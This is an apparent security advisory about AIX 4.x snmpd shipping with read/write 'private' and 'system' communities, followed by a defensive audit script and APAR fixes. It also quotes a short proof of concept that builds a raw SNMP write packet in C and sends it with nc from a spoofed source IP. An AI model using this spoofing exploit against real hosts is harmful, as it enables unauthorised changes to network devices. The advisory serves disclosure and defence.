COMMAND

    SNMP

SYSTEMS AFFECTED

    AIX 4.x

PROBLEM

    'harikiri' posted the following. This was seen on both AIX 4.3 and
    4.2. It appears that on the above releases of AIX, the SNMP daemon
    is enabled by default and two community names are enabled with
    read/write privileges. The community names are "private" and
    "system", but are only allowed from localhost connections.
    Nevertheless, a local user may install an SNMP client and modify
    sensitive variables. Excerpt from /etc/snmpd.conf:

        <snip>

        # 2. Set the community names and access privileges for hosts that can make
        #    requests of this snmpd agent.  Define these restrictions as follows:
        #
        #       community  <name>  <address>  <netmask>  <permissions> <view name>

        <snip>

        community       public
        community       private 127.0.0.1 255.255.255.255 readWrite
        community       system  127.0.0.1 255.255.255.255 readWrite 1.17.2
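    The following audit script is an added example and not part of the
    original advisory or of AIX. It parses community lines in the format
    documented in the excerpt above and reports every community that
    grants write access, plus every community using a well-known default
    name. The sample configuration is constructed here and modelled on
    the excerpt; the defaults assumed for omitted fields (any host,
    readOnly) are an assumption of this script, not something the
    advisory states.

```shell
#!/bin/sh
# Added example (not from the advisory): audit snmpd.conf community lines.

# Constructed sample modelled on the /etc/snmpd.conf excerpt in the advisory.
SAMPLE_CONF='# 2. Set the community names and access privileges
#       community  <name>  <address>  <netmask>  <permissions> <view name>
community       public
community       private 127.0.0.1 255.255.255.255 readWrite
community       system  127.0.0.1 255.255.255.255 readWrite 1.17.2
community       ops_ro  10.1.2.3  255.255.255.255 readOnly'

# audit_communities CONF_TEXT
# Prints one finding per line:
#   WRITE <name> <address>/<netmask>   community has write permission
#   KNOWN <name>                       well-known default community name
# Assumption (not stated in the advisory): when <address>, <netmask> or
# <permissions> are omitted, the entry is treated as any-host / readOnly.
audit_communities() {
    printf '%s\n' "$1" | awk '
        /^[ \t]*#/ { next }                 # skip comment lines
        NF == 0    { next }                 # skip blank lines
        $1 == "community" {
            name = $2
            addr = (NF >= 3) ? $3 : "0.0.0.0"
            mask = (NF >= 4) ? $4 : "0.0.0.0"
            perm = (NF >= 5) ? $5 : "readOnly"
            if (tolower(perm) ~ /write/)
                printf "WRITE %s %s/%s\n", name, addr, mask
            if (name == "public" || name == "private" || name == "system")
                printf "KNOWN %s\n", name
        }'
}

# count_findings KIND CONF_TEXT -> number of findings of the given kind
count_findings() {
    audit_communities "$2" | grep -c "^$1 "
}

# Run against the constructed sample; on a live system feed it
# "$(cat /etc/snmpd.conf)" instead.
audit_communities "$SAMPLE_CONF"
```

    Any WRITE finding is worth reviewing even when the address is
    127.0.0.1, since the advisory's point is that localhost-only
    restrictions do not stop local users and can be spoofed from outside
    if the host accepts loopback-sourced packets on an external
    interface.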

    SNMP requests with no authentication except for source-IP
    comparison are spoofable.

        #!/bin/bash

        # Writes a fixed SNMP packet using the "private" community to stdout.
        cat >/tmp/spoof1.c <<_EOF_
        #include <unistd.h>
        char
        private[]="0\202\0-\2\1\0\4\7private\243\37\2\1\1\2\1\0\2\1\0000\0240\202"
        "\0\20\6\10+\6\1\2\1\1\4\0\4\4null";
        int main(void) { write(1, private, sizeof(private)); return 0; }
        _EOF_

        gcc -o /tmp/spoof1 /tmp/spoof1.c

        /tmp/spoof1 | nc -s FakeSourceIPHere -u RemoteIPHere 161

    UDP blind spoofing, nothing easier.

SOLUTION

    This is fixed in AIX 4.3 with APAR IY04865 and was announced on the
    Security_APARs mailing list from aixserv@austin.ibm.com in January.

    All recent versions of AIX discard packets with a source address of
    loopback when the packet comes in on an external interface. The
    following APARs have been available for over 2 years:

        4.1.x APAR: IX71366
        4.2.x APAR: IX71405
        4.3.x APAR: included in 4.3.0 initial release